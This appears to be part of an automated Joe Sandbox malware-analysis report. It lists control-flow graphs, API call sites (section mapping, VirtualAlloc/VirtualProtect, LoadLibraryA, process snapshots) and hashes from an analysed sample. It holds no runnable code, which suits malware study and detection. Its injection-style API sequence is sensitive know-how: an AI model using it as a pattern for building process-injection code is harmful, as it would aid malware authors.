                                                                                                                                                                                                                                                                                                                  control_flow_graph 346 4015bc-4015e3 call 40120e 351 4015e5 346->351 352 4015e8-4015ed 346->352 351->352 354 401913-40191b 352->354 355 4015f3-401604 352->355 354->352 360 401920-401966 call 40120e 354->360 358 401911 355->358 359 40160a-401633 355->359 358->360 359->358 367 401639-401650 NtDuplicateObject 359->367 367->358 369 401656-40167a NtCreateSection 367->369 371 4016d6-4016fc NtCreateSection 369->371 372 40167c-40169d NtMapViewOfSection 369->372 371->358 376 401702-401706 371->376 372->371 374 40169f-4016bb NtMapViewOfSection 372->374 374->371 377 4016bd-4016d3 374->377 376->358 379 40170c-40172d NtMapViewOfSection 376->379 377->371 379->358 381 401733-40174f NtMapViewOfSection 379->381 381->358 384 401755 call 40175a 381->384
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208706668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 72661907227a9452eb25ab953c02bdcf5a827517e06e297a0d085dc110f4c5bf
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 765dedf92b6036aea99e2596c7c6646b0bcbba97602321f23575c560d9e65fb8
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72661907227a9452eb25ab953c02bdcf5a827517e06e297a0d085dc110f4c5bf
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1451E8B5900249BFEF208F91CC48FDF7BB8FF85B10F104169FA11AA2A5D6749945CB64
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 386 4015cb-4015e3 call 40120e 392 4015e5 386->392 393 4015e8-4015ed 386->393 392->393 395 401913-40191b 393->395 396 4015f3-401604 393->396 395->393 401 401920-401966 call 40120e 395->401 399 401911 396->399 400 40160a-401633 396->400 399->401 400->399 408 401639-401650 NtDuplicateObject 400->408 408->399 410 401656-40167a NtCreateSection 408->410 412 4016d6-4016fc NtCreateSection 410->412 413 40167c-40169d NtMapViewOfSection 410->413 412->399 417 401702-401706 412->417 413->412 415 40169f-4016bb NtMapViewOfSection 413->415 415->412 418 4016bd-4016d3 415->418 417->399 420 40170c-40172d NtMapViewOfSection 417->420 418->412 420->399 422 401733-40174f NtMapViewOfSection 420->422 422->399 425 401755 call 40175a 422->425
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208706668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 004f83838c091370c792dd4fcb680897e20f1790ca1ffba750393c7614aa26f8
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 60f1a669064b898f2f8cfe764b4cdaf5e199705ebcb5ef48edc51869d28594cd
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 004f83838c091370c792dd4fcb680897e20f1790ca1ffba750393c7614aa26f8
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C51FAB1900249BFEF208F91CC48F9FBBB8FF85B10F104169FA11AA2A5D7749941CB24
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 427 91e9b8-91e9d1 428 91e9d3-91e9d5 427->428 429 91e9d7 428->429 430 91e9dc-91e9e8 CreateToolhelp32Snapshot 428->430 429->430 431 91e9f8-91ea05 Module32First 430->431 432 91e9ea-91e9f0 430->432 433 91ea07-91ea08 call 91e677 431->433 434 91ea0e-91ea16 431->434 432->431 439 91e9f2-91e9f6 432->439 437 91ea0d 433->437 437->434 439->428 439->431
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0091E9E0
                                                                                                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 0091EA00
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2209438963.0000000000919000.00000040.00000020.00020000.00000000.sdmp, Offset: 00919000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_919000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 174a3bbd8776eac9f072759655ce4ec8ef3012e6a399f5ca709e772919b8fafe
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2F0C2316007286BE7603AB8988CBAEB6ECBF48321F100229EA52950C0CB70EC854A60
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 443 4029ba-4029c3 444 4029d3 443->444 445 4029ca-4029cf 443->445 444->445 446 4029d6-402a0b call 40120e 444->446 445->446 455 402a0f-402a1d LdrLoadDll 446->455 456 402a26-402a71 call 40120e 455->456 457 402a1f 455->457 457->456
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208706668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8b4368bb53e1649655da800b8e3771367f61da053ffbe47dde7c34dc5595736a
                                                                                                                                                                                                                                                                                                                  • Instruction ID: ddfd821467dba8d9e3be05996510f596060048204c77d2b9bdf6330f9e046059
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b4368bb53e1649655da800b8e3771367f61da053ffbe47dde7c34dc5595736a
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C11E571708104E7D6209A449B4EF6B3724AB50B00F308077E5077A1C0D9FD9A07BBAF
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 0 42e6b0-42e6f0 2 42e6f4-42e6f9 0->2 3 42e70b-42e715 2->3 4 42e6fb-42e707 2->4 5 42e717-42e760 3->5 6 42e764-42e769 3->6 4->3 5->6 8 42e782-42e78c 6->8 9 42e76b-42e773 6->9 8->2 12 42e792 8->12 9->8 11 42e775-42e780 9->11 11->8 14 42e794-42e79b 11->14 13 42e7c8-42e7d2 12->13 17 42ea70-42ea7e 13->17 18 42e7d8-42e828 13->18 14->13 15 42e79d-42e7c0 14->15 15->13 19 42ea80-42ea86 17->19 45 42e837-42e963 18->45 46 42e82a-42e834 18->46 22 42ea93-42ea9d 19->22 23 42ea88-42ea8d 19->23 25 42ea9f-42eab8 22->25 26 42eabc-42eac3 22->26 23->22 25->26 26->19 27 42eac5-42eae1 GlobalAlloc 26->27 31 42eae7-42eaf3 27->31 32 42eb7e-42eb89 27->32 34 42eaf9-42eafe 31->34 35 42eb90-42eb93 32->35 37 42eb00-42eb3f 34->37 38 42eb46-42eb53 call 42e130 34->38 39 42eb95-42ebb5 35->39 40 42ebba-42ebbb 35->40 37->38 53 42eb75-42eb78 38->53 54 42eb55-42eb70 38->54 39->40 40->35 43 42ebbd-42ebcd 40->43 49 42ebd0-42ebdb 43->49 110 42e977-42e9da 45->110 111 42e965-42e974 45->111 46->45 51 42ebe6-42ebe7 49->51 52 42ebdd-42ebe1 49->52 51->49 55 42ebe9-42ec0d call 42e080 call 42e440 51->55 52->51 53->32 53->34 54->53 69 42ec10-42ec1a 55->69 70 42ec24-42ec32 GlobalFlags LocalSize 69->70 71 42ec1c-42ec20 69->71 73 42ec34-42ec39 70->73 74 42ec3f-42ec46 70->74 71->70 73->74 74->69 75 42ec48-42ec5d LoadLibraryA 74->75 77 42ed53-42ed6a 75->77 78 42ec63-42ed48 75->78 78->77 112 42ea27-42ea6d 110->112 113 42e9dc-42e9e0 110->113 111->110 112->17 115 42e9e2-42e9f1 113->115 116 42ea1e-42ea24 113->116 121 42e9f3-42e9f6 115->121 122 42e9fc-42ea12 115->122 116->112 121->122 123 42e9f8-42e9f9 121->123 122->116 125 42ea14-42ea1a 122->125 123->122 125->116
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000000,007BC964), ref: 0042EACD
                                                                                                                                                                                                                                                                                                                  • GlobalFlags.KERNEL32(00000000), ref: 0042EC26
                                                                                                                                                                                                                                                                                                                  • LocalSize.KERNEL32(00000000), ref: 0042EC2A
                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(004042A8), ref: 0042EC4D
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208724906.000000000042E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_42e000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Global$AllocFlagsLibraryLoadLocalSize
                                                                                                                                                                                                                                                                                                                  • String ID: (H7$XH@$lH@
                                                                                                                                                                                                                                                                                                                  • API String ID: 2181924483-3656395101
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 92610714a21dda742868bf2367f4e4ef561245d9dc16923959ff5e1a89e67b5b
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8099c32e484168f09429c500e39e6e70eb2455f7c22bec5011dac1a35774a5f5
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92610714a21dda742868bf2367f4e4ef561245d9dc16923959ff5e1a89e67b5b
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B02B5B1604380ABE320EBA1DD85F5B77E4FB84704F50493EF689A72D1DB786844CB5A
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 126 89003c-890047 127 890049 126->127 128 89004c-890263 call 890a3f call 890e0f call 890d90 VirtualAlloc 126->128 127->128 143 89028b-890292 128->143 144 890265-890289 call 890a69 128->144 146 8902a1-8902b0 143->146 148 8902ce-8903c2 VirtualProtect call 890cce call 890ce7 144->148 146->148 149 8902b2-8902cc 146->149 155 8903d1-8903e0 148->155 149->146 156 890439-8904b8 VirtualFree 155->156 157 8903e2-890437 call 890ce7 155->157 158 8904be-8904cd 156->158 159 8905f4-8905fe 156->159 157->155 162 8904d3-8904dd 158->162 163 89077f-890789 159->163 164 890604-89060d 159->164 162->159 166 8904e3-890505 162->166 167 89078b-8907a3 163->167 168 8907a6-8907b0 163->168 164->163 169 890613-890637 164->169 177 890517-890520 166->177 178 890507-890515 166->178 167->168 170 89086e-8908be LoadLibraryA 168->170 171 8907b6-8907cb 168->171 172 89063e-890648 169->172 176 8908c7-8908f9 170->176 174 8907d2-8907d5 171->174 172->163 175 89064e-89065a 172->175 179 890824-890833 174->179 180 8907d7-8907e0 174->180 175->163 181 890660-89066a 175->181 182 8908fb-890901 176->182 183 890902-89091d 176->183 184 890526-890547 177->184 178->184 188 890839-89083c 179->188 185 8907e2 180->185 186 8907e4-890822 180->186 187 89067a-890689 181->187 182->183 189 89054d-890550 184->189 185->179 186->174 190 89068f-8906b2 187->190 191 890750-89077a 187->191 188->170 192 89083e-890847 188->192 194 8905e0-8905ef 189->194 195 890556-89056b 189->195 196 8906ef-8906fc 190->196 197 8906b4-8906ed 190->197 191->172 198 890849 192->198 199 89084b-89086c 192->199 194->162 202 89056d 195->202 203 89056f-89057a 195->203 200 89074b 196->200 201 8906fe-890748 196->201 197->196 198->170 199->188 200->187 201->200 202->194 206 89059b-8905bb 203->206 207 89057c-890599 203->207 210 8905bd-8905db 206->210 207->210 210->189
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0089024D
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2209182155.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_890000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1f131b03efb52d8d2cb776e081289fe3a7e0bf253f2524d73c33877c8b79cae2
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C526974A01229DFDB64CF98C984BA8BBB1BF09314F1480D9E54DAB351DB30AE85DF15
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 440 890e0f-890e24 SetErrorMode * 2 441 890e2b-890e2c 440->441 442 890e26 440->442 442->441
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,00890223,?,?), ref: 00890E19
                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,00890223,?,?), ref: 00890E1E
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2209182155.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_890000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                                                  • Instruction ID: e153f05878e9c0a74f13e5799d4f8d311248a5422619a5405020419e5db8524d
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26D0123514512877DB003A94DC09BCD7B1CDF05B62F048411FB0DD9080C770994046E5
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 469 4029c5-402a0b call 40120e 480 402a0f-402a1d LdrLoadDll 469->480 481 402a26-402a71 call 40120e 480->481 482 402a1f 480->482 482->481
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208706668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 630f67e63f4c9d6cadc1f4ef28869250e9dd95ac73f78134dda1cef590dfe083
                                                                                                                                                                                                                                                                                                                  • Instruction ID: eda82e36109819710fc28ef01b941f30aa1b457bd77d6c907d6690057fca41fa
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 630f67e63f4c9d6cadc1f4ef28869250e9dd95ac73f78134dda1cef590dfe083
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C01C471708205E7DA60DA949A4EB6B7710AB51B10F308077E5037A1C4DAFD9A07FB6B
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 494 4029d1-4029d3 496 4029d6-402a0b call 40120e 494->496 497 4029ca-4029cf 494->497 506 402a0f-402a1d LdrLoadDll 496->506 497->496 507 402a26-402a71 call 40120e 506->507 508 402a1f 506->508 508->507
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208706668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8aebd7c2dfb35844096bdf04bcf18f9291abc38b44631a4f8f553a04b448b611
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 27f311fed6bd4bb195386d6e886048742e5b6b48a655c0a394e70793ed6bf28f
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8aebd7c2dfb35844096bdf04bcf18f9291abc38b44631a4f8f553a04b448b611
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0018071708105E7DA609A449B4EB6B7324BB50B10F308477E5077A1C4DAFD9A07BB6F
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 520 40d8ac-40d8b6 521 40d8d3-40d8dc 520->521 522 40d8b8-40d8c2 520->522 524 40d8de 521->524 525 40d8df-40d8e4 521->525 522->521 523 40d8c4-40d8d2 522->523 524->525 526 40d8e6-40d8f7 RtlAllocateHeap 525->526 527 40d8f9-40d900 525->527 526->527 528 40d92b-40d92d 526->528 529 40d902-40d90b call 40de36 527->529 530 40d91e-40d923 527->530 529->525 535 40d90d-40d912 529->535 530->528 533 40d925 530->533 533->528 536 40d914 535->536 537 40d91a-40d91c 535->537 536->537 537->528
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0040B13A,?,?,00000000), ref: 0040D8EF
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208724906.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: a94024be4463f28e86786baba5d25b388673a66689faf64f83668a8d1ab9a822
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 32653bed96846e10ed93f98ad81b9e01bfccb852d110e1386259c0f7a325a759
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a94024be4463f28e86786baba5d25b388673a66689faf64f83668a8d1ab9a822
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1501DD36A012159AEB28AFA5DC04B673395AF81364F00853BE816EB2D0DB38DC058748
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 538 4029d5-402a0b call 40120e 546 402a0f-402a1d LdrLoadDll 538->546 547 402a26-402a71 call 40120e 546->547 548 402a1f 546->548 548->547
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208706668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 14f9d75437b26c4e33ab762a249f6d4a6897a4cf10a17b4738070ea496484bd2
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6c082c2f6db60d75b034223dafbed04b71575a1e0537fab93527f59567f6cb96
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14f9d75437b26c4e33ab762a249f6d4a6897a4cf10a17b4738070ea496484bd2
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB01B531708105E7DB60DA409A4DF5F7720BB50B10F208577E5077A1C4DAF99A17EB9B
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 560 4029e2-402a0b call 40120e 567 402a0f-402a1d LdrLoadDll 560->567 568 402a26-402a71 call 40120e 567->568 569 402a1f 567->569 569->568
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208706668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
